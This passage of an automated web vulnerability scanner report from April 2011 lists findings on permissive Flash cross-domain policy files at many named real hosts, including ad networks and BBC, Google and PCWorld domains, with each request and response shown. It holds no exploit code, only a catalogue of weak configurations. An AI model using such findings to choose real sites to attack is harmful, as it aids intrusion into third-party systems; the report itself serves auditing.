Host: smetrics.freecreditreport.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:03 GMT
Server: Omniture DC/2.0.0
xserver: www310
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.74. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sun, 01 May 2011 11:58:17 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.75. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.76. http://switch.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.77. http://testdata.coremetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://testdata.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: testdata.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:20:55 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "273b20-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=946
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.78. http://tracking.keywordmax.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.keywordmax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tracking.keywordmax.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 16 Jan 2007 19:43:34 GMT
ETag: "98-4272d93d40580"
Accept-Ranges: bytes
Content-Length: 152
X-Server-Name: kwmweb@dc1kwmweb07
Keep-Alive: timeout=3, max=498
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.keywordmax.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.79. http://transunioninteractive.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://transunioninteractive.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: transunioninteractive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:46 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.80. http://www.dictof.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dictof.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:09 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Wed, 23 Sep 2009 22:46:44 GMT
ETag: "14f-474467d34fd00"
Accept-Ranges: bytes
Content-Length: 335

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.81. http://www.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:19 GMT
Server: Apache
X-GasHost: gas3
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 542
Content-Length: 194
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"194-1297458026000"
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.82. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 01:40:10 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Mon, 25 Apr 2011 01:41:07 +0000 GMT
Etag: 740e6c55d2e424fc461edac9610ab0f7
X-Served-By: h01

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

7.83. http://de.swisscom.ch/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.swisscom.ch
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.swisscom.ch

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:49:44 GMT
Connection: close
Content-Type: text/xml
Content-Length: 394
Accept-Ranges: bytes
Last-Modified: Thu, 02 Jul 2009 13:49:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="bluewin.ch" />
<allow-access-from domain="*.bluewin.ch" />
<allow-access-from domain="swisscom.ch" />
<allow-access-from domain="*.swisscom.ch" />
...[SNIP]...

7.84. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 24 Apr 2011 17:18:13 GMT
Date: Sun, 24 Apr 2011 17:16:13 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.85. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:20:00 GMT
Expires: Sun, 24 Apr 2011 21:20:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 21200
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.86. http://i35.tinypic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i35.tinypic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i35.tinypic.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:44 GMT
Content-Length: 916
Content-Type: text/xml
ETag: "394-39350380"
Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT
Accept-Ranges: bytes
Server: Apache
X-Cache: MISS from tinypic.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="tinypic.com" />
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="photobucket.com" />
<allow-access-from domain="*.dancejam.com" />
<allow-access-from domain="dancejam.com" />
<allow-access-from domain="*.fotoflexer.com"/>
<allow-access-from domain="fotoflexer.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="flektor.com"/>
<allow-access-from domain="*.picnik.com"/>
<allow-access-from domain="picnik.com"/>
<allow-access-from domain="*.glogster.com"/>
<allow-access-from domain="glogster.com"/>
...[SNIP]...

7.87. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 24 Apr 2011 17:17:58 GMT
Date: Sun, 24 Apr 2011 17:15:58 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.88. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:09:23 GMT
Expires: Sun, 24 Apr 2011 21:09:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25850
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.89. http://partners.nextadnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: partners.nextadnetwork.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:32 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Last-Modified: Fri, 17 Oct 2008 14:23:20 GMT
ETag: "da-45973b505a600"
Accept-Ranges: bytes
Content-Length: 218
X-Server-Name: www@dc1dtweb74
Keep-Alive: timeout=3, max=898
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.directtrack.com" />
</cro
...[SNIP]...

7.90. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:17:46 GMT
Expires: Sun, 24 Apr 2011 21:17:46 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 81811

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.91. http://www.apmebf.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apmebf.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.92. http://www.bluewin.ch/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluewin.ch
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
